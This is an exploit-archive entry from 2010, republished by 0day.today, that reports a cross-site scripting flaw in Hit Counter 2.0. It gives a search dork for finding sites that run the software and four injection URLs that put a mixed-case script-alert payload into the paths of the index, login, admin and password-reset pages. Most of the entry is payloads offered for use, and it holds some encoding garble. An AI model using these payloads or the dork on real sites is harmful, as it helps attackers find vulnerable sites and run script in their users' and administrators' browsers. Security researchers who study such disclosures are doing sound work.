Hit Counter 2.0 Cross Site Scripting Vulnerability

2010-03-10T00:00:00
ID 1337DAY-ID-11252
Type zdt
Reporter indoushka
Modified 2010-03-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================	
Hit Counter 2.0 Cross Site Scripting Vulnerability
==================================================

| # Dork : Powered by Hit Counter v2.0 (c) eTek Systems

| # Tested on: windows SP2 Fran?§ais V.(Pnx2 2.0) + Lunix
Fran?§ais v.(9.4 Ubuntu)
| # Bug : XSS

====================== Exploit By indoushka
=================================
# Exploit :

1- XSS (Cross Site Scripting in URI)

http://server/ww-hc20/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt>

http://server/ww-hc20/inc/login.php/>'><ScRiPt>alert(213771818860)</ScRiPt>


http://server/ww-hc20/admin/index.php/>'><ScRiPt>alert(213771818860)</ScRiP
t>

http://server/ww-hc20/admin/forgot.php/>"><ScRiPt>alert(213771818860)</ScRi
Pt>




#  0day.today [2018-04-12]  #